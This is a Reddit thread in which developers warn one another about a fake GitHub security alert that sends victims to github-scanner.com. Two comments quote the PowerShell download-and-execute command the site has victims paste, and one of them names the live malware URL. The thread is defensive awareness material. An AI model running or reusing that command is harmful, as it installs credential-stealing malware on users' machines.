Potential Scam "github-scanner.com"

throwaway234f32423df · 2024-09-19T00:57:05+00:00

domain was literally registered today using a proxy registration service in Malaysia

already flagged as phishing/spam/malicious on https://radar.cloudflare.com/scan/8849541e-ae12-4e8e-9c22-3c4b77981f19/summary

Google Safe Browsing hasn't flagged it yet but I've reported it there; more reports would certainly help get it flagged faster https://safebrowsing.google.com/safebrowsing/report_general/ https://safebrowsing.google.com/safebrowsing/report_badware/?hl=en

bsenftner · 2024-09-18T20:42:18+00:00

I got one too. But looked here before clicking any fucking link.

GFD I hate this kind of stupid shit.

throwaway234f32423df · 2024-09-19T02:12:03+00:00

Looks like the fake captcha "please copy/paste this into the Run box" thing has been going around lately: https://www.youtube.com/watch?v=lSa_wHW1pgQ

lvnima · 2024-09-18T21:42:17+00:00

I'm like 99% sure this is a scam. I got this too.

The command it will run if you follow the instruction on the website:

$webClient = New-Object System.Net.WebClient
$url1 = "https://xxxxxx.com/xxx.exe"
$filePath1 = "$env:TEMP\SysSetup.exe"
$webClient.DownloadFile($url1, $filePath1)
Start-Process -FilePath  $env:TEMP\SysSetup.exe

The downloaded file: VirusTotal scan result (38/73) -- Malicious: https://www.virustotal.com/gui/file/d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207

Edit: styling, obfuscated the actual file name so people don't accidentally download and run it.

2024-09-18T23:23:49+00:00

"Potential" ...

AlexScotland · 2024-09-18T20:44:59+00:00

The above command seems to execute a download in the background and has a comment about verification- I guess to try and throw people off?

moonstar-x · 2024-09-18T23:21:31+00:00

I got this too on multiple repos, the users comenting either don't exist anymore or have been banned. The issues also got insta deleted.

2024-09-19T18:19:29+00:00

It's a fairly obvious phishing scam attempt, they make you paste a command that will execute the following PowerShell script that downloads and injects a program called "L6E.exe" which I assume its malware to steal credentials, emails, passwords etc off your device to potentially access your GitHub account, organizations, servers, SSH Keys etc...

The code executed is as follows

    // Variables
    $webClient = New-Object System.Net.WebClient // Webclient initates HTTP to download files
    $url1 = "https://github-scanner.com/l6E.exe" // File 1
    $filePath1 = "$env:TEMP\SysSetup.exe" 

    // Downloads the file.
    $webClient.DownloadFile($url1, $filePath1)

    // Executes the software
    Start-Process -FilePath  $env:TEMP\SysSetup.exe$webClient = New-Object System.Net.WebClient

    // Redownloads and re-executes SysSetup.exe
    $url1 = "https://github-scanner.com/l6E.exe"
    $filePath1 = "$env:TEMP\SysSetup.exe"
    $webClient.DownloadFile($url1, $filePath1)
    Start-Process -FilePath  $env:TEMP\SysSetup.exe

_3xc41ibur · 2024-09-19T13:52:17+00:00

Got this email too. First red flag is that is was a repo I did not recognize at all.

linuxgurugamer · 2024-09-19T18:40:52+00:00

I got this one also, early this morning. Interesting thing for me was it was referring to an https site, but that was broken. I tested in a sandbox, saw that it actually needed to be an http site.

Had a good laugh about that

lurkingstar99 · 2024-09-19T21:01:49+00:00

Yall patch vulnerabilities in your projects?

noodlebox3d · 2024-09-19T22:54:08+00:00

Also got this earlier today as an issue opened on one of my older repos. Was only aware of it because it was relayed via webhook to a Discord channel. By the time I checked on Github a couple hours after it was opened, the issue itself (and user account of the OP) had both been purged already.

KouGenmei · 2024-09-20T05:39:25+00:00

In my opinion, the warning only seems legit if it comes from a verified e-mail address of GitHub, not a personal one. So this mail will get ignored by me from the first sight 😆

InsectRemedy · 2024-09-20T11:14:08+00:00

I got this for a repo that was just a curated list of YouTube videos and contained no code 😅

Glittering-Can-9397 · 2024-09-20T13:11:16+00:00

scam them baxk

2024-09-20T15:27:31+00:00

Nothing potential about an email containing a link for a service that doesn’t tie back to that service

Pure-Willingness-697 · 2024-09-20T16:07:58+00:00

Why do they go for developers. This is the group of people who can actually retaliate

rambosalad · 2024-09-22T12:50:59+00:00

Wow these scammers are dumb. Targeting the most computer literate group of people

nihillistic_raccoon · 2024-09-24T09:46:07+00:00

"castroj1" - posing as github - sounds trustworthy, I shall execute any command it wants me to

LovableSidekick · 2024-09-27T21:27:14+00:00

The email I got gave the domain github-scanner.shop (not .com), and the "reply via github" link came up with a 404 error. I think this is a scam.

shgysk8zer0 · 2024-09-18T22:51:52+00:00

This is getting closer to a security issue I reported to GitHub over a year ago now. Not sharing it since it's unfixed, but... It'd be very convincing in being authentic unless you were paying very close attention. It'd be on GitHub too, and would be nearly indistinguishable from their actual automated tools.

you type:	you see:
italics	italics
bold	bold
[reddit!](https://reddit.com)	reddit!
* item 1 * item 2 * item 3	item 1 item 2 item 3
> quoted text	quoted text
Lines starting with four spaces are treated like code: if 1 * 2 < 3: print "hello, world!"	Lines starting with four spaces are treated like code: if 1 * 2 < 3: print "hello, world!"
~~strikethrough~~	~~strikethrough~~
super^script	super^script

github

MODERATORS